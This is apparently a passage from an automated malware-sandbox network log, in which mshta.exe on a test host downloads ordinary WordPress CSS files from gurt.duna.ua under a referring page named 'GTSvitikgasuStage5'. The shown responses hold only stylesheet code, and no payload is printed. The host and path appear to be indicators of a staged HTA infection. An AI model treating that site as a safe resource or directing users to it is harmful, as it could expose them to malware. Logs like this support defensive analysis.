                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:17 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:17 UTC735INData Raw: 2e 77 6f 6f 66 2d 73 64 2d 74 6f 6f 6c 74 69 70 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 7d 0a 0a 2e 77 6f 6f 66 2d 73 64 2d 74 6f 6f 6c 74 69 70 20 2e 77 6f 6f 66 2d 73 64 2d 74 6f 6f 6c 74 69 70 74 65 78 74 20 7b 0a 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 30 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 35 70 78 20 30 3b 0a 20 20 20 20 70 6f 73 69 74
                                                                                                                                                                                                      Data Ascii: .woof-sd-tooltip { position: relative;}.woof-sd-tooltip .woof-sd-tooltiptext { visibility: hidden; min-width: 120px; background-color: black; color: #fff; text-align: center; border-radius: 6px; padding: 5px 0; posit


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      17192.168.2.549723185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:18 UTC476OUTGET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/front.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:18 UTC330INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:18 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 483
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                                      ETag: "64e0908f-1e3"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:18 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:18 UTC483INData Raw: 2e 77 6f 6f 66 5f 6c 69 73 74 5f 73 64 20 2e 77 6f 6f 66 5f 6f 70 65 6e 5f 68 69 64 64 65 6e 5f 6c 69 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 7d 0a 0a 2e 77 6f 6f 66 2d 73 64 2d 69 65 20 2e 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 6f 75 6e 74 3a 65 6d 70 74 79 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 77 6f 6f 66 2d 73 64 2d 69 65 20 2e 77 6f 6f 66 2d 73 64 2d 6c 69 73 74 2d 6f 70 65 6e 65 72 7b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 74 6f 70 3a 20 2d 31 70 78 3b 0a 7d 0a 0a 2e 77 6f 6f 66 2d 73 64 2d 69 65 20 77 6f 6f 66 2d 73 64 2d 6c 69 73 74 2d 6f 70 65 6e 65 72 7b 0a
                                                                                                                                                                                                      Data Ascii: .woof_list_sd .woof_open_hidden_li{ width: 100%;}.woof-sd-ie .woof-sd-ie-count:empty{ display: none !important;}.woof-sd-ie .woof-sd-list-opener{ line-height: 0; position: relative; top: -1px;}.woof-sd-ie woof-sd-list-opener{


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      18192.168.2.549724185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:18 UTC460OUTGET /wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:18 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:18 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 4289
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                                      ETag: "64e0908f-10c1"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:18 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:18 UTC4289INData Raw: 3a 72 6f 6f 74 20 7b 0d 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 76 65 72 74 65 78 5f 65 6e 61 62 6c 65 64 5f 62 67 5f 63 6f 6c 6f 72 3a 20 23 37 39 62 38 66 66 3b 0d 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 73 75 62 73 74 72 61 74 65 5f 65 6e 61 62 6c 65 64 5f 62 67 5f 63 6f 6c 6f 72 3a 20 23 63 38 65 31 66 66 3b 0d 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 76 65 72 74 65 78 5f 64 69 73 61 62 6c 65 64 5f 62 67 5f 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 73 75 62 73 74 72 61 74 65 5f 64 69 73 61 62 6c 65 64 5f 62 67 5f 63 6f 6c 6f 72 3a 20 23 39 61 39 39 39 39 3b 0d 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 76 65 72 74 65 78 5f 73 69 7a 65 3a 20
                                                                                                                                                                                                      Data Ascii: :root { --woof-sd-ie-vertex_enabled_bg_color: #79b8ff; --woof-sd-ie-substrate_enabled_bg_color: #c8e1ff; --woof-sd-ie-vertex_disabled_bg_color: #ffffff; --woof-sd-ie-substrate_disabled_bg_color: #9a9999; --woof-sd-ie-vertex_size:


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      19192.168.2.549726185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:19 UTC466OUTGET /wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2.3.8 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:19 UTC328INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:19 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 89
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Fri, 10 Sep 2021 13:16:34 GMT
                                                                                                                                                                                                      ETag: "613b5ab2-59"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:19 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:19 UTC89INData Raw: 2e 61 77 64 72 5f 64 69 73 63 6f 75 6e 74 5f 62 61 72 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 7d
                                                                                                                                                                                                      Data Ascii: .awdr_discount_bar{ padding: 10px; margin-bottom: 10px; border-radius: 4px;}


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      20192.168.2.549727185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:19 UTC462OUTGET /wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:19 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:19 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 1143
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Fri, 16 Jul 2021 08:06:48 GMT
                                                                                                                                                                                                      ETag: "60f13e18-477"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:19 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:19 UTC1143INData Raw: 2e 61 77 64 72 5f 66 72 65 65 5f 70 72 6f 64 75 63 74 5f 74 65 78 74 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 20 31 30 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 64 39 63 64 32 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 70 78 3b 0a 7d 0a 2e 76 61 72 69 61 74 69 6f 6e 2d 77 64 72 5f 66 72 65 65 5f 70 72 6f 64 75 63 74 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 2e 61 77 64 72 5f 63 68 61 6e 67 65 5f 70 72 6f 64 75 63 74 7b 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 7d 0a
                                                                                                                                                                                                      Data Ascii: .awdr_free_product_text{ display: inline-block; padding: 0px 10px; background-color: #3d9cd2; color: #fff; border-radius: 3px;}.variation-wdr_free_product{ display: none !important;}.awdr_change_product{ cursor: pointer;}


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      21192.168.2.549731185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:20 UTC446OUTGET /wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:21 UTC335INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:20 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 145954
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:50:41 GMT
                                                                                                                                                                                                      ETag: "64e09071-23a22"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:20 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:21 UTC16049INData Raw: 40 63 68 61 72 73 65 74 20 22 75 74 66 2d 38 22 3b 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 64 65 74 61 69 6c 73 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 6d 61 69 6e 2c 6d 65 6e 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65
                                                                                                                                                                                                      Data Ascii: @charset "utf-8";html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;font-family:sans-serif}body{margin:0}article,aside,details,figcaption,figure,footer,header,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline
                                                                                                                                                                                                      2024-10-27 06:35:21 UTC16384INData Raw: 75 6d 6e 20 6c 69 3e 61 2c 2e 6e 61 76 2d 64 72 6f 70 64 6f 77 6e 3e 6c 69 3e 61 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 6e 61 76 2d 63 6f 6c 75 6d 6e 3e 6c 69 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 6e 6f 74 28 2e 6e 61 76 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 29 3e 61 2c 2e 6e 61 76 2d 64 72 6f 70 64 6f 77 6e 3e 6c 69 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 6e 6f 74 28 2e 6e 61 76 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 29 3e 61 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 72 6f 70 64 6f 77 6e 2d 75 70 70 65 72 63 61 73 65 2e 6e 61 76 2d 64 72 6f 70 64 6f 77 6e 20 2e 6e 61 76 2d
                                                                                                                                                                                                      Data Ascii: umn li>a,.nav-dropdown>li>a{display:block;line-height:1.3;padding:10px 20px;width:auto}.nav-column>li:last-child:not(.nav-dropdown-col)>a,.nav-dropdown>li:last-child:not(.nav-dropdown-col)>a{border-bottom:0!important}.dropdown-uppercase.nav-dropdown .nav-
                                                                                                                                                                                                      2024-10-27 06:35:21 UTC16384INData Raw: 3e 6c 69 2b 6c 69 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 32 29 7d 2e 6e 61 76 2d 76 65 72 74 69 63 61 6c 3e 6c 69 2b 6c 69 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 63 65 63 65 63 7d 2e 6e 61 76 2d 76 65 72 74 69 63 61 6c 2d 66 6c 79 2d 6f 75 74 3e 6c 69 2b 6c 69 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 65 63 65 63 65 63 7d 2e 6e 61 76 2d 76 65 72 74 69 63 61 6c 2e 6e 61 76 2d 6c 69 6e 65 3e 6c 69 3e 61 3a 62 65 66 6f 72 65 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 61 75 74 6f 3b 72 69 67 68 74 3a 2d 32 70 78 3b 77 69 64 74 68 3a 33 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 7d 2e 6e 61 76 2d 76 65 72 74 69 63 61 6c 2e 6e 61 76 2d 74 61 62 73 3e 6c 69 3e 61 7b 62 6f
                                                                                                                                                                                                      Data Ascii: >li+li{border-color:hsla(0,0%,100%,.2)}.nav-vertical>li+li{border-top:1px solid #ececec}.nav-vertical-fly-out>li+li{border-color:#ececec}.nav-vertical.nav-line>li>a:before{height:100%;left:auto;right:-2px;width:3px;z-index:1}.nav-vertical.nav-tabs>li>a{bo
                                                                                                                                                                                                      2024-10-27 06:35:21 UTC16384INData Raw: 30 32 29 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 34 65 6d 7d 2e 73 65 6c 65 63 74 2d 72 65 73 69 7a 65 2d 67 68 6f 73 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6f 70 61 63 69 74 79 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 61 75 74 6f 7d 73 65 6c 65 63 74 2e 72 65 73 69 7a 65 2d 73 65 6c 65 63 74 7b 77 69 64 74 68 3a 35 35 70 78 7d 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 5f 5f 61 72 72 6f 77 20 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 65 6c 65 63 74 69 6f 6e 20 2e 73 65 6c 65 63 74 32 2d 73 65
                                                                                                                                                                                                      Data Ascii: 02);display:block;padding-right:1.4em}.select-resize-ghost{display:inline-block;opacity:0;position:absolute;width:auto}select.resize-select{width:55px}.select2-selection__arrow b{border-color:transparent!important}.select2-container .selection .select2-se
                                                                                                                                                                                                      2024-10-27 06:35:21 UTC16384INData Raw: 69 67 68 74 3a 30 7d 2e 6d 66 70 2d 69 6d 67 2d 6d 6f 62 69 6c 65 20 69 6d 67 2e 6d 66 70 2d 69 6d 67 7b 70 61 64 64 69 6e 67 3a 30 7d 2e 6d 66 70 2d 69 6d 67 2d 6d 6f 62 69 6c 65 20 2e 6d 66 70 2d 66 69 67 75 72 65 3a 61 66 74 65 72 7b 62 6f 74 74 6f 6d 3a 30 3b 74 6f 70 3a 30 7d 2e 6d 66 70 2d 69 6d 67 2d 6d 6f 62 69 6c 65 20 2e 6d 66 70 2d 66 69 67 75 72 65 20 73 6d 61 6c 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 70 78 7d 2e 6d 66 70 2d 69 6d 67 2d 6d 6f 62 69 6c 65 20 2e 6d 66 70 2d 62 6f 74 74 6f 6d 2d 62 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 36 29 3b 62 6f 74 74 6f 6d 3a 30 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a
                                                                                                                                                                                                      Data Ascii: ight:0}.mfp-img-mobile img.mfp-img{padding:0}.mfp-img-mobile .mfp-figure:after{bottom:0;top:0}.mfp-img-mobile .mfp-figure small{display:inline;margin-left:5px}.mfp-img-mobile .mfp-bottom-bar{background:rgba(0,0,0,.6);bottom:0;box-sizing:border-box;margin:
                                                                                                                                                                                                      2024-10-27 06:35:21 UTC16384INData Raw: 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 3b 62 6f 74 74 6f 6d 3a 2d 36 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6c 65 66 74 3a 2d 31 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 2d 31 30 25 3b 7a 2d 69 6e 64 65 78 3a 2d 32 7d 2e 73 6c 69 64 65 72 2d 73 74 79 6c 65 2d 73 68 61 64 6f 77 20 2e 66 6c 69 63 6b 69 74 79 2d 73 6c 69 64 65 72 3e 3a 6e 6f 74 28 2e 69 73 2d 73 65 6c 65 63 74 65 64 29 7b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 39 29 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 73 6c 69 64 65 72 2d 73 74 79 6c 65 2d 73 68 61 64 6f 77 20 2e 66 6c 69 63 6b 69 74 79 2d 73 6c 69 64 65 72 3e 3a 6e 6f 74 28 2e
                                                                                                                                                                                                      Data Ascii: ;background-size:100% 100%;bottom:-6px;content:"";height:100px;left:-10%;position:absolute;right:-10%;z-index:-2}.slider-style-shadow .flickity-slider>:not(.is-selected){opacity:1;transform:scale(.9);z-index:-1}.slider-style-shadow .flickity-slider>:not(.
                                                                                                                                                                                                      2024-10-27 06:35:21 UTC16384INData Raw: 69 7a 65 3a 38 2e 35 70 78 7d 2e 73 6d 61 6c 6c 2d 35 20 2e 72 65 73 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 39 70 78 7d 2e 73 6d 61 6c 6c 2d 36 20 2e 72 65 73 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 73 6d 61 6c 6c 2d 37 20 2e 72 65 73 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 7d 2e 73 6d 61 6c 6c 2d 38 20 2e 72 65 73 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 73 6d 61 6c 6c 2d 39 20 2e 72 65 73 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 7d 2e 73 6d 61 6c 6c 2d 31 30 20 2e 72 65 73 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 6d 61 6c 6c 2d 31 31 20 2e 72 65 73 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 40 6d 65 64 69 61
                                                                                                                                                                                                      Data Ascii: ize:8.5px}.small-5 .res-text{font-size:9px}.small-6 .res-text{font-size:10px}.small-7 .res-text{font-size:11px}.small-8 .res-text{font-size:12px}.small-9 .res-text{font-size:13px}.small-10 .res-text{font-size:14px}.small-11 .res-text{font-size:15px}@media
                                                                                                                                                                                                      2024-10-27 06:35:22 UTC16384INData Raw: 72 2d 73 69 64 65 74 69 70 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 64 65 66 61 75 6c 74 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 74 6f 70 20 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 61 72 72 6f 77 7b 62 6f 74 74 6f 6d 3a 30 3b 68 65 69 67 68 74 3a 38 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 38 70 78 3b 77 69 64 74 68 3a 31 36 70 78 7d 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 73 69 64 65 74 69 70 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 64 65 66 61 75 6c 74 20 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 61 72 72 6f 77 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 73 69 64 65 74 69 70 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 64 65 66 61 75 6c 74 20 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 61 72 72 6f 77 2d 62 6f 72 64 65 72 7b 68 65 69 67
                                                                                                                                                                                                      Data Ascii: r-sidetip.tooltipster-default.tooltipster-top .tooltipster-arrow{bottom:0;height:8px;margin-left:-8px;width:16px}.tooltipster-sidetip.tooltipster-default .tooltipster-arrow-background,.tooltipster-sidetip.tooltipster-default .tooltipster-arrow-border{heig
                                                                                                                                                                                                      2024-10-27 06:35:22 UTC15217INData Raw: 34 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 65 72 3b 6d 61 72 67 69 6e 3a 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 6c 6f 67 6f 20 69 6d 67 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 68 65 61 64 65 72 2d 6c 6f 67 6f 2d 64 61 72 6b 2c 2e 68 65 61 64 65 72 2d 6c 6f 67 6f 2d 73 74 69 63 6b 79 2c 2e 6e 61 76 2d 64 61 72 6b 20 2e 68 65 61 64 65 72 2d 6c 6f 67 6f 2c 2e 73 74 69 63 6b 79 20 2e 64 61 72 6b 20 2e 68 65 61 64 65 72 2d 6c 6f 67 6f 2d 64 61 72 6b 2c 2e 73 74 69 63 6b 79 20 2e 68 61 73 2d 73 74 69 63 6b 79 2d 6c 6f
